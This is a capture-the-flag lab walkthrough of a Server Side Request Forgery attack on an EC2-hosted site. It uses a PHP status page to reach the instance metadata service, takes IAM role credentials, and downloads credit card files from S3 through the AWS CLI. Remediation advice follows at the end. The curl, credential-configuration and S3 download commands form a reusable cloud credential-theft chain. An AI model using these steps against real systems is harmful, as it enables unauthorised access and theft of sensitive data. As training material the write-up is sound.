EC2 SSRF Attack

A walkthrough demonstrating a Server Side Request Forgery attack leading to credit card data exfiltration.

CTF Source: Pwned Labs


In this walkthrough, we'll perform a Server Side Request Forgery (SSRF) attack leading to the compromise and exfiltration of credit card data. The lab is meant to mimic the 2019 Capital One data breach which also involved exploitation of SSRF, abusing EC2's metadata service, and gaining credentials to an IAM Role.


  • Install awscli: brew install awscli (mac) apt install awscli (linux)


Accessing the website & identifying the server

We start our engagement with an IP address and are led to believe it goes to a website.

When attempting to access the website in the browser, it redirects to http://hugelogistics.pwn/

We can also confirm this with ⁠curl -I to see the headers

HTTP/1.1 301 Moved Permanently
Date: Wed, 03 Jan 2024 22:50:19 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://hugelogistics.pwn/
Content-Type: text/html; charset=iso-8859-1

We can update our ⁠/etc/hosts⁠ file like so, allowing us to view the webpage

sudo -- sh -c "echo '    hugelogistics.pwn' >> /etc/hosts"
  • sudo since /etc/hosts requires elevated permissions

  • sh to execute a shell command

  • ⁠-c⁠ to enable reading the string as a command

Now, we can view the webpage

If we want to understand who owns the website we can run ⁠whois and see it’s an Amazon IP specifically for EC2.

OrgAbuseHandle: AEA8-ARIN
OrgAbuseName:   Amazon EC2 Abuse
OrgAbusePhone:  +1-206-555-0000 

We can also do ⁠nslookup⁠ and confirm the DNS Hostname of the EC2 instance.


Non-authoritative answer:

We also learn this is in the us-east-1 region according to Amazon’s doc -

A public (external) IPv4 DNS hostname takes the form for the us-east-1 Region, and for other Regions.

Identifying the backend storage

Let’s take a look at the website source code.

<!-- shipping -->
<section class="shipping py-5">
	<div class="container py-lg-5 py-md-3">
		<div class="row">
			<div class="col-lg-5 p-md-0">
				<img src="" alt="" class="img-fluid"/>
			<div class="col-lg-7 p-0 mt-lg-0 mt-4">

We can see the website uses S3 as its storage backend. Let’s try to access the bucket contents.

aws s3 ls s3://huge-logistics-storage/ --no-sign-request --recursive
  • --no-sign-request is needed so we’re not signing the request with any local aws credentials

  • --recursive will try enumerating the full bucket contents

2023-05-31 16:14:05          0 backup/
2023-05-31 16:14:47       3717 backup/cc-export2.txt
2023-06-01 08:38:27         32 backup/flag.txt
2023-05-31 14:40:47          0 web/
2023-05-31 14:42:33     114886 web/images/about.jpg
2023-05-31 14:42:34     271657 web/images/banner.jpg
2023-05-31 14:42:35      48441 web/images/blog1.jpg
2023-05-31 14:42:36      32805 web/images/blog2.jpg
2023-05-31 14:42:36      44570 web/images/blog3.jpg
2023-05-31 14:42:37      20032 web/images/executive.jpg
2023-05-31 14:42:37      13368 web/images/manager.jpg
2023-05-31 14:42:38      18260 web/images/manager1.jpg
2023-05-31 14:42:38      42216 web/images/signature.jpg

As we can see there’s a ton of data in the bucket. The backup/ folder looks interesting. Can we copy it locally?

aws s3 cp s3://huge-logistics-storage/backup/ . --no-sign-request --recursive

download failed: s3://huge-logistics-storage/backup/cc-export2.txt to ./cc-export2.txt An error occurred (AccessDenied) when calling the GetObject operation: Access Denied
download failed: s3://huge-logistics-storage/backup/flag.txt to ./flag.txt An error occurred (AccessDenied) when calling the GetObject operation: Access Denied

Unfortunately not.

Identifying and Exploiting an SSRF Vulnerability

Heading back to the website we find the Status page in the menu bar.

Clicking this takes us to a webpage that appears to run a ⁠php⁠ script when clicking the Check button.

Looking at the website source code, we can assume it’s taking ⁠hugelogisticsstatus.pwn⁠ and sending it to the server.

So, we do know this website is hosted on EC2 as we discovered earlier.

EC2 has a meta-data service that is available at a local address of ⁠⁠.

If the PHP script is not doing proper validation, we could attempt to access this service.

With the instance meta-data service or IMDS, we can find out a ton of information about the instance such as if it has an IAM role assigned to it.

We can also inspect any user data such as initialization scripts admins might use to configure EC2 which may contain credentials.

Let’s give it a shot! We can attempt this in either the browser or the terminal. I’ll use the terminal.

curl http://hugelogistics.pwn/status/status.php?name=

We don’t get anything back other than the website code. Let’s try to check the meta-data instead.

curl http://hugelogistics.pwn/status/status.php?name=


Success! We can access data on the instance. Let’s find out if an IAM role/credentials are tied to this EC2.

We can assume it might since it’s pulling data from S3 for the website.

If we look at Amazon’s documentation, we’ll first try ⁠iam/info


  "Code" : "Success",
  "LastUpdated" : "2024-01-03T23:24:05Z",
  "InstanceProfileArn" : "arn:aws:iam::[snip]:instance-profile/MetapwnedS3Access",
  "InstanceProfileId" : "AIPARQV[snip]"

And look at that! We just confirmed the EC2 has an instance profile assigned to it. Let’s grab the name ⁠MetapwnedS3Access⁠ and leverage another category to grab its credentials.

curl http://hugelogistics.pwn/status/status.php?name=

  "Code" : "Success",
  "LastUpdated" : "2024-01-03T23:24:35Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIARQV[snip]",
  "SecretAccessKey" : "wj+h4gVHo[snip]",
  "Token" : "IQoJb3JpZ2[snip]",
  "Expiration" : "2024-01-04T05:38:34Z"

Are you as excited as I am right now?


Let’s configure our local AWS credentials and attempt to use the ones we just found.

Just run ⁠aws configure⁠ and it’ll prompt you to copy/paste the ⁠AccessKeyId⁠ and ⁠SecretAccessKey⁠.

After that, we’ll need to add the ⁠Token⁠ since this is an IAM Role we’re using. We can do it like so:

aws configure set aws_session_token IQoJb3JpZ[snip]

Next, we’ll run a command to check our identity. Similar to running ⁠whoami⁠.

aws sts get-caller-identity

    "UserId": "AROARQV[snip]:i-0199bf97fb9d996f1",
    "Account": "[snip]",
    "Arn": "arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1"

Nice. Let’s see what permissions we have by inspecting our attached IAM policies. This will check for any managed policies attached to our role.

aws iam list-attached-role-policies --role-name MetapwnedS3Access

An error occurred (AccessDenied) when calling the ListAttachedRolePolicies operation: User: arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1 is not authorized to perform: iam:ListAttachedRolePolicies on resource: role MetapwnedS3Access because no identity-based policy allows the iam:ListAttachedRolePolicies action

Bummer. No permission to view this. Well, let’s see if we can view inline policies.

aws iam list-role-policies --role-name MetapwnedS3Access         

An error occurred (AccessDenied) when calling the ListRolePolicies operation: User: arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1 is not authorized to perform: iam:ListRolePolicies on resource: role MetapwnedS3Access because no identity-based policy allows the iam:ListRolePolicies action

Okay, no dice. Not to fret, this was just to try and enumerate all permissions this IAM Role has. We can assume it has access to the S3 bucket we discovered earlier.

Access the S3 Bucket Files

Let’s try and access those backup files.

aws s3 cp s3://huge-logistics-storage/backup/ . --recursive 

download: s3://huge-logistics-storage/backup/flag.txt to ./flag.txt
download: s3://huge-logistics-storage/backup/cc-export2.txt to ./cc-export2.txt
cat cc-export2.txt  
VISA, 4929854977595222, 5/2028, 733
VISA, 4532044427558124, 7/2024, 111
VISA, 4539773096403690, 12/2028, 429
cat flag.txt 

Success! We discovered the flag and what appear to be plaintext credit card numbers!


So, much like the attackers who breached Capital One in 2019, we also performed a Server Side Request Forgery (SSRF) attack.

This led to us gaining access to an EC2’s IMDS, discovering the EC2’s instance role credentials, and gaining access to an S3 bucket used for both the static website it was hosting and for sensitive credit card data.

From a defender’s perspective, there are a few things that should be addressed.

  1. The S3 bucket was being used for multiple functions (hosting a website and storing credit card data)

    • These should have been separate buckets - especially for something as sensitive as the CC data

    • Multiple functions mean complicating permissions which can lead to misconfiguration and errors

  2. The S3 bucket contents could be seen by anyone in the world

    • This enabled us to have our interest peaked when we saw back/cc-export2.txt and should have been prevented

  3. The PHP script wasn’t using proper input validation

    • This allowed us to access IMDS

  4. IMDS

    • If the service isn’t needed, it can be disabled (see Example 2)

    • If it’s needed, use IMDSv2 which can require session tokens for authentication with the service. However, the attack in this scenario is still possible since we can use the SSRF vulnerability to generate a session token. (see Amazon doc)

Last updated